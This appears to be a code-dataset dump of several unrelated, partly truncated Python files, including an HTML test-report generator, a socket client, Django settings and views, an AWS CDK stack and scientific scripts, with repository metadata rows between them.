result=model.predict_classes(img1)
plt.title(result[0])
plt.show()
image_path="all.jpg"
img = image.load_img(image_path, target_size=(IMG_HEIGHT, IMG_WIDTH))
plt.imshow(img)
img = np.expand_dims(img, axis=0)
result=model.predict_classes(img)
plt.title(result[0])
plt.show()
| 29.878788 | 130 | 0.683773 |
c779118332635de2c8ae2f98f07d435f86ed8e76 | 2,361 | py | Python | fastrunner/httprunner3/report/html/gen_report.py | Chankee/AutoTestRunner | 5f329b0dfac91ccd3541aabf46cc997cc4f01da3 | [
"MIT"
] | 1 | 2020-04-30T08:41:19.000Z | 2020-04-30T08:41:19.000Z | httprunner/report/html/gen_report.py | Barronliu/httprunner | 463b8c68cbd413fd2bb66852752149bc1609e98d | [
"Apache-2.0"
] | null | null | null | httprunner/report/html/gen_report.py | Barronliu/httprunner | 463b8c68cbd413fd2bb66852752149bc1609e98d | [
"Apache-2.0"
] | null | null | null | import io
import os
from datetime import datetime
from jinja2 import Template
from loguru import logger
from httprunner.exceptions import SummaryEmpty
def gen_html_report(summary, report_template=None, report_dir=None, report_file=None):
""" render html report with specified report name and template
Args:
summary (dict): test result summary data
report_template (str): specify html report template path, template should be in Jinja2 format.
report_dir (str): specify html report save directory
report_file (str): specify html report file path, this has higher priority than specifying report dir.
"""
if not summary["time"] or summary["stat"]["testcases"]["total"] == 0:
logger.error(f"test result summary is empty ! {summary}")
raise SummaryEmpty
if not report_template:
report_template = os.path.join(
os.path.abspath(os.path.dirname(__file__)),
"template.html"
)
logger.debug("No html report template specified, use default.")
else:
logger.info(f"render with html report template: {report_template}")
logger.info("Start to render Html report ...")
start_at_timestamp = summary["time"]["start_at"]
utc_time_iso_8601_str = datetime.utcfromtimestamp(start_at_timestamp).isoformat()
summary["time"]["start_datetime"] = utc_time_iso_8601_str
if report_file:
report_dir = os.path.dirname(report_file)
report_file_name = os.path.basename(report_file)
else:
report_dir = report_dir or os.path.join(os.getcwd(), "reports")
# fix #826: Windows does not support file name include ":"
report_file_name = "{}.html".format(utc_time_iso_8601_str.replace(":", "").replace("-", ""))
if not os.path.isdir(report_dir):
os.makedirs(report_dir)
report_path = os.path.join(report_dir, report_file_name)
with io.open(report_template, "r", encoding='utf-8') as fp_r:
template_content = fp_r.read()
with io.open(report_path, 'w', encoding='utf-8') as fp_w:
rendered_content = Template(
template_content,
extensions=["jinja2.ext.loopcontrols"]
).render(summary)
fp_w.write(rendered_content)
logger.info(f"Generated Html report: {report_path}")
return report_path
| 36.323077 | 110 | 0.674714 |
c779400f9f454e7ffcd25d7cea5b32ebe4fe996a | 730 | py | Python | SD/lab1/client.py | matheuscr30/UFU | e947e5a4ccd5c025cb8ef6e00b42ea1160742712 | [
"MIT"
] | null | null | null | SD/lab1/client.py | matheuscr30/UFU | e947e5a4ccd5c025cb8ef6e00b42ea1160742712 | [
"MIT"
] | 11 | 2020-01-28T22:59:24.000Z | 2022-03-11T23:59:04.000Z | SD/lab1/client.py | matheuscr30/UFU | e947e5a4ccd5c025cb8ef6e00b42ea1160742712 | [
"MIT"
] | null | null | null | #client.py
#!/usr/bin/python # This is client.py file
import socket # Import socket module
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 12352 # Reserve a port for your service.
s.connect((host, port))
while True:
message = input('Digite mensagem: ')
s.send(bytes(message, encoding='utf8'))
if message == 'SAIR':
breaks
print('Mensagem enviada.')
print('Esperando resposta.')
answer = s.recv(1024).decode('utf8')
print('Resposta recebida: ' + answer)
print('Desconectando.')
s.close()
| 27.037037 | 82 | 0.536986 |
c77943cb74b84356ac52ea818e7a35cca299778c | 4,040 | py | Python | tests/helpers.py | ws4/TopCTFd | 3b1e25df1318e86ff163a0b546f6e9b7f8305a5a | [
"Apache-2.0"
] | 1 | 2019-06-25T09:24:29.000Z | 2019-06-25T09:24:29.000Z | tests/helpers.py | ws4/TopCTFd | 3b1e25df1318e86ff163a0b546f6e9b7f8305a5a | [
"Apache-2.0"
] | null | null | null | tests/helpers.py | ws4/TopCTFd | 3b1e25df1318e86ff163a0b546f6e9b7f8305a5a | [
"Apache-2.0"
] | null | null | null | from CTFd import create_app
from CTFd.models import *
from sqlalchemy_utils import database_exists, create_database, drop_database
from sqlalchemy.engine.url import make_url
import datetime
import six
if six.PY2:
text_type = unicode
binary_type = str
else:
text_type = str
binary_type = bytes
| 27.297297 | 117 | 0.592574 |
c77b3c34564c716c04ed2a2e2297c397f73e511f | 1,741 | py | Python | homeassistant/components/kaiterra/const.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 30,023 | 2016-04-13T10:17:53.000Z | 2020-03-02T12:56:31.000Z | homeassistant/components/kaiterra/const.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 24,710 | 2016-04-13T08:27:26.000Z | 2020-03-02T12:59:13.000Z | homeassistant/components/kaiterra/const.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 11,956 | 2016-04-13T18:42:31.000Z | 2020-03-02T09:32:12.000Z | """Consts for Kaiterra integration."""
from datetime import timedelta
from homeassistant.const import (
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_MILLIGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_BILLION,
CONCENTRATION_PARTS_PER_MILLION,
PERCENTAGE,
Platform,
)
DOMAIN = "kaiterra"
DISPATCHER_KAITERRA = "kaiterra_update"
AQI_SCALE = {
"cn": [0, 50, 100, 150, 200, 300, 400, 500],
"in": [0, 50, 100, 200, 300, 400, 500],
"us": [0, 50, 100, 150, 200, 300, 500],
}
AQI_LEVEL = {
"cn": [
"Good",
"Satisfactory",
"Moderate",
"Unhealthy for sensitive groups",
"Unhealthy",
"Very unhealthy",
"Hazardous",
],
"in": [
"Good",
"Satisfactory",
"Moderately polluted",
"Poor",
"Very poor",
"Severe",
],
"us": [
"Good",
"Moderate",
"Unhealthy for sensitive groups",
"Unhealthy",
"Very unhealthy",
"Hazardous",
],
}
ATTR_VOC = "volatile_organic_compounds"
ATTR_AQI_LEVEL = "air_quality_index_level"
ATTR_AQI_POLLUTANT = "air_quality_index_pollutant"
AVAILABLE_AQI_STANDARDS = ["us", "cn", "in"]
AVAILABLE_UNITS = [
"x",
PERCENTAGE,
"C",
"F",
CONCENTRATION_MILLIGRAMS_PER_CUBIC_METER,
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_MILLION,
CONCENTRATION_PARTS_PER_BILLION,
]
AVAILABLE_DEVICE_TYPES = ["laseregg", "sensedge"]
CONF_AQI_STANDARD = "aqi_standard"
CONF_PREFERRED_UNITS = "preferred_units"
DEFAULT_AQI_STANDARD = "us"
DEFAULT_PREFERRED_UNIT: list[str] = []
DEFAULT_SCAN_INTERVAL = timedelta(seconds=30)
PLATFORMS = [Platform.SENSOR, Platform.AIR_QUALITY]
| 22.907895 | 51 | 0.649627 |
c77bfcd69447b6d8753b518a3930aaea586d8856 | 440 | py | Python | support/views.py | bhagirath1312/ich_bau | d37fe7aa3379f312a4d8b5f3d4715dd334b9adb0 | [
"Apache-2.0"
] | 1 | 2021-11-25T19:37:01.000Z | 2021-11-25T19:37:01.000Z | support/views.py | bhagirath1312/ich_bau | d37fe7aa3379f312a4d8b5f3d4715dd334b9adb0 | [
"Apache-2.0"
] | 197 | 2017-09-06T22:54:20.000Z | 2022-02-05T00:04:13.000Z | support/views.py | bhagirath1312/ich_bau | d37fe7aa3379f312a4d8b5f3d4715dd334b9adb0 | [
"Apache-2.0"
] | 2 | 2017-11-08T02:13:03.000Z | 2020-09-30T19:48:12.000Z | from django.shortcuts import render, redirect
from django.http import HttpResponseRedirect
from .models import SupportProject
# Create your views here.
| 27.5 | 76 | 0.688636 |
c77bfffe662ca6c238ec477ceec482de486d7271 | 2,931 | py | Python | timeline/models.py | KolibriSolutions/BepMarketplace | c47d252fd744cde6b927e37c34d7a103c6162be5 | [
"BSD-3-Clause"
] | 1 | 2019-06-29T15:24:24.000Z | 2019-06-29T15:24:24.000Z | timeline/models.py | KolibriSolutions/BepMarketplace | c47d252fd744cde6b927e37c34d7a103c6162be5 | [
"BSD-3-Clause"
] | 2 | 2020-01-12T17:47:33.000Z | 2020-01-12T17:47:45.000Z | timeline/models.py | KolibriSolutions/BepMarketplace | c47d252fd744cde6b927e37c34d7a103c6162be5 | [
"BSD-3-Clause"
] | 2 | 2019-06-29T15:24:26.000Z | 2020-01-08T15:15:03.000Z | # Bep Marketplace ELE
# Copyright (c) 2016-2021 Kolibri Solutions
# License: See LICENSE file or https://github.com/KolibriSolutions/BepMarketplace/blob/master/LICENSE
#
from datetime import datetime
from django.core.exceptions import ValidationError
from django.db import models
| 38.565789 | 119 | 0.643125 |
c77d8ee927213d5c37d334a8dc0c0e3d7493a2cf | 2,221 | py | Python | app/api/user_routes.py | nappernick/envelope | af4f574c04c51293b90ee2e09d0f95d12ca36d2c | [
"MIT"
] | 2 | 2021-01-13T22:52:16.000Z | 2021-01-29T18:37:51.000Z | app/api/user_routes.py | nappernick/envelope | af4f574c04c51293b90ee2e09d0f95d12ca36d2c | [
"MIT"
] | 32 | 2021-01-08T19:05:33.000Z | 2021-04-07T22:01:54.000Z | app/api/user_routes.py | nappernick/envelope | af4f574c04c51293b90ee2e09d0f95d12ca36d2c | [
"MIT"
] | null | null | null | from datetime import datetime
from werkzeug.security import generate_password_hash
from flask import Blueprint, jsonify, request
from sqlalchemy.orm import joinedload
from flask_login import login_required
from app.models import db, User, Type
from app.forms import UpdateUserForm
from .auth_routes import authenticate, validation_errors_to_error_messages
user_routes = Blueprint('users', __name__)
| 30.013514 | 74 | 0.692031 |
c77e4ddc9f8fe255a8511d43e707cc1ce8c44d20 | 19,717 | py | Python | timeflux/nodes/ml.py | OpenMindInnovation/timeflux | fd27ea6706df80fa52fb73ea3dba65e14ccd088c | [
"MIT"
] | null | null | null | timeflux/nodes/ml.py | OpenMindInnovation/timeflux | fd27ea6706df80fa52fb73ea3dba65e14ccd088c | [
"MIT"
] | null | null | null | timeflux/nodes/ml.py | OpenMindInnovation/timeflux | fd27ea6706df80fa52fb73ea3dba65e14ccd088c | [
"MIT"
] | null | null | null | """Machine Learning"""
import importlib
import numpy as np
import pandas as pd
import json
from jsonschema import validate
from sklearn.pipeline import make_pipeline
from timeflux.core.node import Node
from timeflux.core.exceptions import ValidationError, WorkerInterrupt
from timeflux.helpers.background import Task
from timeflux.helpers.port import make_event, match_events, get_meta
from timeflux.helpers.clock import now, min_time, max_time
# Statuses
IDLE = 0
ACCUMULATING = 1
FITTING = 2
READY = 3
| 39.121032 | 103 | 0.502054 |
c780e591cbad3129663e73ce7d7f50fa3fb44f8f | 3,675 | py | Python | cms/migrations/0006_auto_20170122_1545.py | josemlp91/django-landingcms | 9d9270204369e9663ff15eb0bd4c4093b3727c6c | [
"Apache-2.0"
] | null | null | null | cms/migrations/0006_auto_20170122_1545.py | josemlp91/django-landingcms | 9d9270204369e9663ff15eb0bd4c4093b3727c6c | [
"Apache-2.0"
] | null | null | null | cms/migrations/0006_auto_20170122_1545.py | josemlp91/django-landingcms | 9d9270204369e9663ff15eb0bd4c4093b3727c6c | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-22 15:45
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
| 47.115385 | 164 | 0.653605 |
c781463cac684dcc8d5bd7e224347018ce45563c | 3,641 | py | Python | 1-lab-lambdaDynamoDB/source/cdk/app.py | donnieprakoso/workshop-buildingRESTAPIwithAWS | b3287d5749b65648710dde4e736ba55b73371c6b | [
"Apache-2.0"
] | 23 | 2021-04-24T06:32:58.000Z | 2022-03-27T11:04:57.000Z | 1-lab-lambdaDynamoDB/source/cdk/app.py | ivandi1980/workshop-restAPI | b3287d5749b65648710dde4e736ba55b73371c6b | [
"Apache-2.0"
] | null | null | null | 1-lab-lambdaDynamoDB/source/cdk/app.py | ivandi1980/workshop-restAPI | b3287d5749b65648710dde4e736ba55b73371c6b | [
"Apache-2.0"
] | 5 | 2021-04-24T12:10:02.000Z | 2021-11-18T13:34:33.000Z | #!/usr/bin/env python3
from aws_cdk import aws_iam as _iam
from aws_cdk import aws_lambda as _lambda
from aws_cdk import aws_dynamodb as _ddb
from aws_cdk import core
stack_prefix='restAPI-lab1-lambdaDynamoDB'
app = core.App()
stack = CdkStack(app, stack_prefix, stack_prefix=stack_prefix)
core.Tags.of(stack).add('Name',stack_prefix)
app.synth()
| 44.950617 | 177 | 0.682505 |
c7821ff30782af7bc27dc24920e0c07f5856c1a5 | 326 | py | Python | module_6_lets_make_a_web_app/webapp/yield.py | JCarlos831/python_getting_started_-pluralsight- | 5059a1019c46eb8174fc86989fab7cc0c4caffd4 | [
"MIT"
] | null | null | null | module_6_lets_make_a_web_app/webapp/yield.py | JCarlos831/python_getting_started_-pluralsight- | 5059a1019c46eb8174fc86989fab7cc0c4caffd4 | [
"MIT"
] | null | null | null | module_6_lets_make_a_web_app/webapp/yield.py | JCarlos831/python_getting_started_-pluralsight- | 5059a1019c46eb8174fc86989fab7cc0c4caffd4 | [
"MIT"
] | null | null | null | students = []
read_file()
print(students) | 16.3 | 40 | 0.57362 |
c782a4a5ddbb4061270df891d7584a13d55d2191 | 6,325 | py | Python | paul_analysis/Python/labird/gamma.py | lzkelley/arepo-mbh-sims_analysis | f14519552cedd39a040b53e6d7cc538b5b8f38a3 | [
"MIT"
] | null | null | null | paul_analysis/Python/labird/gamma.py | lzkelley/arepo-mbh-sims_analysis | f14519552cedd39a040b53e6d7cc538b5b8f38a3 | [
"MIT"
] | null | null | null | paul_analysis/Python/labird/gamma.py | lzkelley/arepo-mbh-sims_analysis | f14519552cedd39a040b53e6d7cc538b5b8f38a3 | [
"MIT"
] | null | null | null | """Module for finding an effective equation of state for in the Lyman-alpha forest
from a snapshot. Ported to python from Matteo Viel's IDL script."""
import h5py
import math
import numpy as np
def read_gamma(num,base):
"""Reads in an HDF5 snapshot from the NE gadget version, fits a power law to the
equation of state for low density, low temperature gas.
Inputs:
num - snapshot number
base - Snapshot directory
Outputs:
(T_0, \gamma) - Effective equation of state parameters
"""
# Baryon density parameter
omegab0 = 0.0449
singlefile=False
#base="/home/spb41/data2/runs/bf2/"
snap=str(num).rjust(3,'0')
fname=base+"/snapdir_"+snap+"/snap_"+snap
try:
f=h5py.File(fname+".0.hdf5",'r')
except IOError:
fname=base+"/snap_"+snap
f=h5py.File(fname+".hdf5",'r')
singlefile=True
print 'Reading file from:',fname
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
redshift=head["Redshift"]
print "z=",redshift
atime=head["Time"]
h100=head["HubbleParam"]
if npart[0] == 0 :
print "No gas particles!\n"
return
f.close()
# Scaling factors and constants
Xh = 0.76 # Hydrogen fraction
G = 6.672e-11 # N m^2 kg^-2
kB = 1.3806e-23 # J K^-1
Mpc = 3.0856e22 # m
kpc = 3.0856e19 # m
Msun = 1.989e30 # kg
mH = 1.672e-27 # kg
H0 = 1.e5/Mpc # 100 km s^-1 Mpc^-1 in SI units
gamma = 5.0/3.0
rscale = (kpc * atime)/h100 # convert length to m
#vscale = atime**0.5 # convert velocity to km s^-1
mscale = (1e10 * Msun)/h100 # convert mass to kg
dscale = mscale / (rscale**3.0) # convert density to kg m^-3
escale = 1e6 # convert energy/unit mass to J kg^-1
N = 0
sx = 0
sy = 0
sxx = 0
sxy = 0
met = 0
carb = 0
oxy = 0
totmass=0
totigmmass=0
totmet = 0
sxxm = 0
sxym = 0
sxm = 0
sym = 0
for i in np.arange(0,500) :
ffname=fname+"."+str(i)+".hdf5"
if singlefile:
ffname=fname+".hdf5"
if i > 0:
break
#print 'Reading file ',ffname
try:
f=h5py.File(ffname,'r')
except IOError:
break
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
if npart[0] == 0 :
print "No gas particles in file ",i,"!\n"
break
bar = f["PartType0"]
u=np.array(bar['InternalEnergy'],dtype=np.float64)
rho=np.array(bar['Density'],dtype=np.float64)
nelec=np.array(bar['ElectronAbundance'],dtype=np.float64)
metalic = np.array(bar['GFM_Metallicity'],dtype=np.float64)
metals = np.array(bar['GFM_Metals'],dtype=np.float64)
mass = np.array(bar['Masses'], dtype=np.float64)
#nH0=np.array(bar['NeutralHydrogenAbundance'])
f.close()
# Convert to physical SI units. Only energy and density considered here.
rho *= dscale # kg m^-3, ,physical
u *= escale # J kg^-1
## Mean molecular weight
mu = 1.0 / ((Xh * (0.75 + nelec)) + 0.25)
#temp = mu/kB * (gamma-1) * u * mH
#templog = alog10(temp)
templog=np.log10(mu/kB * (gamma-1) * u * mH)
##### Critical matter/energy density at z=0.0
rhoc = 3 * (H0*h100)**2 / (8. * math.pi * G) # kg m^-3
##### Mean hydrogen density of the Universe
nHc = rhoc /mH * omegab0 *Xh * (1.+redshift)**3.0
##### Physical hydrogen number density
#nH = rho * Xh / mH
### Hydrogen density as a fraction of the mean hydrogen density
overden = np.log10(rho*Xh/mH / nHc)
### Calculates average/median temperature in a given overdensity range#
#overden = rho/(rhoc *omegab)
#ind = where(overden ge -0.01 and overden le 0.01)
#avgT0 = mean(temp(ind))
#medT0 = median(temp(ind))
#loT0 = min(temp(ind))
#hiT0 = max(temp(ind))
#
#avgnH1 = mean(nH0(ind))
#mednH1 = median(nH0(ind))
#lonH1 = min(nH0(ind))
#hinH1 = max(nH0(ind))
#
#print,''
#print,'Temperature (K) at mean cosmic density'
#print,'Average temperature [K,log]:',avgT0,alog10(avgT0)
#print,'Median temperature [K,log]:',medT0,alog10(medT0)
#print,'Maximum temperature [K,log]:',hiT0,alog10(hiT0)
#print,'Minimum temperature [K,log]:',loT0,alog10(loT0)
#
#print
#print,'nH1/nH at mean cosmic density'
#print,'Mean log H1 abundance [nH1/nH,log]:',avgnH1,alog10(avgnH1)
#print,'Median log H1 abundance [nH1/nH,log]:',mednH1,alog10(mednH1)
#print,'Maximum log H1 abundance [nH1/nH,log]:',hinH1,alog10(hinH1)
#print,'Minimum log H1 abundance [nH1/nH,log]:',lonH1,alog10(lonH1)
#print
#
ind2 = np.where((overden > 0) * (overden < 1.5) )
tempfit = templog[ind2]
overdenfit = overden[ind2]
N += np.size(ind2)
#print, "Number of fitting points for equation of state", N
indm = np.where(metals < 1e-10)
metals[indm] = 1e-10
sx += np.sum(overdenfit)
sy += np.sum(tempfit)
sxx += np.sum(overdenfit*overdenfit)
sxy += np.sum(overdenfit*tempfit)
met += np.sum(mass[ind2]*metalic[ind2])
carb += np.sum(mass[ind2]*metals[ind2,2])
oxy += np.sum(mass[ind2]*metals[ind2,4])
totmet += np.sum(mass*metalic)
totmass += np.sum(mass)
totigmmass += np.sum(mass[ind2])
sym += np.sum(np.log10(metals[ind2,2]))
sxym += np.sum(overdenfit*np.log10(metals[ind2,2]))
# log T = log(T_0) + (gamma-1) log(rho/rho_0)
# and use least squares fit.
delta = (N*sxx)-(sx*sx)
a = ((sxx*sy) - (sx*sxy))/delta
b = ((N*sxy) - (sx*sy))/delta
amet = ((sxx*sym) - (sx*sxym))/delta
bmet = ((N*sxym) - (sx*sym))/delta
print num,": gamma", b+1.0," log(T0)", a," T0 (K)", (10.0)**a, "Metallicity: ", met/totigmmass,totmet/totmass, "[C/H,O/H]: ",carb/totigmmass, oxy/totigmmass,"(a_Z, b_Z): ",10**amet, bmet
raise Exception
return (redshift,10.0**a, b+1)
| 32.772021 | 192 | 0.552727 |
c782edc67d9a2546d01dc48945d663005d17b20d | 10,490 | py | Python | evogym/envs/change_shape.py | federico-camerota/evogym | fb3a792f93a61be15c9715a036da3721f99d2d42 | [
"MIT"
] | 78 | 2022-01-30T18:59:39.000Z | 2022-03-31T00:26:41.000Z | evogym/envs/change_shape.py | Yuxing-Wang-THU/evogym | da3a0508fa6c5d3fcf589194778844b15a387ece | [
"MIT"
] | 6 | 2022-01-31T02:37:49.000Z | 2022-03-30T18:52:13.000Z | evogym/envs/change_shape.py | Yuxing-Wang-THU/evogym | da3a0508fa6c5d3fcf589194778844b15a387ece | [
"MIT"
] | 6 | 2022-01-31T08:11:33.000Z | 2022-02-22T01:49:50.000Z | import gym
from gym import error, spaces
from gym import utils
from gym.utils import seeding
from evogym import *
from evogym.envs import BenchmarkBase
import random
from math import *
import numpy as np
import os
| 33.196203 | 121 | 0.6102 |
c7852c56539dc442622c1969bd3081ad523df76c | 29,214 | py | Python | pybind/slxos/v16r_1_00b/mpls_state/ldp/fec/ldp_fec_prefixes/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/mpls_state/ldp/fec/ldp_fec_prefixes/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/mpls_state/ldp/fec/ldp_fec_prefixes/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import prefix
import key
| 73.772727 | 744 | 0.742726 |
c78545f3c73bfddebce8e778857a5662b6cdc383 | 610 | py | Python | pug/dj/miner/model_mixin.py | hobson/pug-dj | 55678b08755a55366ce18e7d3b8ea8fa4491ab04 | [
"MIT"
] | null | null | null | pug/dj/miner/model_mixin.py | hobson/pug-dj | 55678b08755a55366ce18e7d3b8ea8fa4491ab04 | [
"MIT"
] | 5 | 2021-09-07T23:53:24.000Z | 2022-03-11T23:22:04.000Z | pug/dj/miner/model_mixin.py | hobson/pug-dj | 55678b08755a55366ce18e7d3b8ea8fa4491ab04 | [
"MIT"
] | 1 | 2015-04-23T14:45:04.000Z | 2015-04-23T14:45:04.000Z | from pug.nlp.db import representation
from django.db import models
| 32.105263 | 150 | 0.727869 |
c785e70d66977d68cd692ad4e28b80dae9e1f5c0 | 4,255 | py | Python | custom_components/kodi_media_sensors/config_flow.py | JurajNyiri/kodi-media-sensors | 055065e52b34555df95a905fc556d3086626deee | [
"MIT"
] | 5 | 2021-03-20T23:32:58.000Z | 2022-03-12T02:01:39.000Z | custom_components/kodi_media_sensors/config_flow.py | JurajNyiri/kodi-media-sensors | 055065e52b34555df95a905fc556d3086626deee | [
"MIT"
] | 11 | 2021-02-09T16:40:34.000Z | 2022-03-20T11:43:06.000Z | custom_components/kodi_media_sensors/config_flow.py | JurajNyiri/kodi-media-sensors | 055065e52b34555df95a905fc556d3086626deee | [
"MIT"
] | 3 | 2021-02-09T17:01:25.000Z | 2022-02-23T22:21:16.000Z | import logging
from typing import Any, Dict, Optional
from homeassistant import config_entries
from homeassistant.components.kodi.const import DOMAIN as KODI_DOMAIN
from homeassistant.core import callback
import voluptuous as vol
from .const import (
OPTION_HIDE_WATCHED,
OPTION_USE_AUTH_URL,
OPTION_SEARCH_LIMIT,
OPTION_SEARCH_LIMIT_DEFAULT_VALUE,
CONF_KODI_INSTANCE,
DOMAIN,
CONF_SENSOR_RECENTLY_ADDED_TVSHOW,
CONF_SENSOR_RECENTLY_ADDED_MOVIE,
CONF_SENSOR_PLAYLIST,
CONF_SENSOR_SEARCH,
)
_LOGGER = logging.getLogger(__name__)
| 36.681034 | 88 | 0.624207 |
c785fce89075a58bb84f43684cf4f43e70fff95c | 3,561 | py | Python | MySite/MainApp/views.py | tananyan/siteee | f90c4ed56122d1af2f3795a0f16c3f294b785ad3 | [
"MIT"
] | 1 | 2021-11-29T14:50:09.000Z | 2021-11-29T14:50:09.000Z | MySite/MainApp/views.py | tananyan/siteee | f90c4ed56122d1af2f3795a0f16c3f294b785ad3 | [
"MIT"
] | null | null | null | MySite/MainApp/views.py | tananyan/siteee | f90c4ed56122d1af2f3795a0f16c3f294b785ad3 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.views.generic.edit import FormView
from django.views.generic.edit import View
from . import forms
# , django .
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import logout
from django.http import HttpResponseRedirect
from django.contrib.auth import login
| 33.914286 | 134 | 0.686043 |
c787795efbca79aae84c0943ac98820495ba5ee9 | 4,057 | py | Python | imagetagger/imagetagger/settings_base.py | jbargu/imagetagger | 216ac5e73902abadc1880321e285e68c55bdfd3d | [
"MIT"
] | 1 | 2019-12-26T09:14:59.000Z | 2019-12-26T09:14:59.000Z | imagetagger/imagetagger/settings_base.py | jbargu/imagetagger | 216ac5e73902abadc1880321e285e68c55bdfd3d | [
"MIT"
] | 4 | 2021-03-19T15:46:34.000Z | 2022-01-13T03:33:04.000Z | imagetagger/imagetagger/settings_base.py | jbargu/imagetagger | 216ac5e73902abadc1880321e285e68c55bdfd3d | [
"MIT"
] | 2 | 2020-09-03T09:22:18.000Z | 2020-09-09T15:13:35.000Z | """
Django settings for imagetagger project.
Generated by 'django-admin startproject' using Django 1.10.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
from django.contrib.messages import constants as messages
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'imagetagger.annotations',
'imagetagger.base',
'imagetagger.images',
'imagetagger.users',
'imagetagger.tools',
'imagetagger.administration',
'django.contrib.admin',
'imagetagger.tagger_messages',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'widget_tweaks',
'friendlytagloader',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.locale.LocaleMiddleware',
]
ROOT_URLCONF = 'imagetagger.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'imagetagger.base.context_processors.base_data',
],
},
},
]
WSGI_APPLICATION = 'imagetagger.wsgi.application'
FILE_UPLOAD_HANDLERS = (
"django.core.files.uploadhandler.MemoryFileUploadHandler",
"django.core.files.uploadhandler.TemporaryFileUploadHandler",
)
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
AUTH_USER_MODEL = 'users.User'
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Berlin' # Timezone of your server
USE_I18N = True
USE_L10N = True
USE_TZ = True
PROBLEMS_URL = 'https://github.com/bit-bots/imagetagger/issues'
PROBLEMS_TEXT = ''
LOGIN_URL = '/user/login/'
LOGIN_REDIRECT_URL = '/images/'
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
MESSAGE_TAGS = {
messages.INFO: 'info',
messages.ERROR: 'danger',
messages.WARNING: 'warning',
messages.SUCCESS: 'success',
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
EXPORT_SEPARATOR = '|'
DATA_PATH = os.path.join(BASE_DIR, 'data')
IMAGE_PATH = os.path.join(BASE_DIR, 'images') # the absolute path to the folder with the imagesets
# filename extension of accepted imagefiles
IMAGE_EXTENSION = {
'png',
'jpeg',
}
# Sets the default expire time for new messages in days
DEFAULT_EXPIRE_TIME = 7
# Sets the default number of messages per page
MESSAGES_PER_PAGE = 10
| 26.51634 | 99 | 0.709884 |
c7879b591e4a17bc5cbafd6cd291d2d73183569a | 23,794 | py | Python | apps/project/views/issue.py | rainydaygit/testtcloudserver | 8037603efe4502726a4d794fb1fc0a3f3cc80137 | [
"MIT"
] | 349 | 2020-08-04T10:21:01.000Z | 2022-03-23T08:31:29.000Z | apps/project/views/issue.py | rainydaygit/testtcloudserver | 8037603efe4502726a4d794fb1fc0a3f3cc80137 | [
"MIT"
] | 2 | 2021-01-07T06:17:05.000Z | 2021-04-01T06:01:30.000Z | apps/project/views/issue.py | rainydaygit/testtcloudserver | 8037603efe4502726a4d794fb1fc0a3f3cc80137 | [
"MIT"
] | 70 | 2020-08-24T06:46:14.000Z | 2022-03-25T13:23:27.000Z | from flask import request
from apps.auth.auth_require import required
from apps.project.business.issue import IssueBusiness, IssueRecordBusiness, IssueDashBoardBusiness
from apps.project.extentions import parse_json_form, validation, parse_list_args2
from library.api.render import json_detail_render, json_list_render2
from library.api.tBlueprint import tblueprint
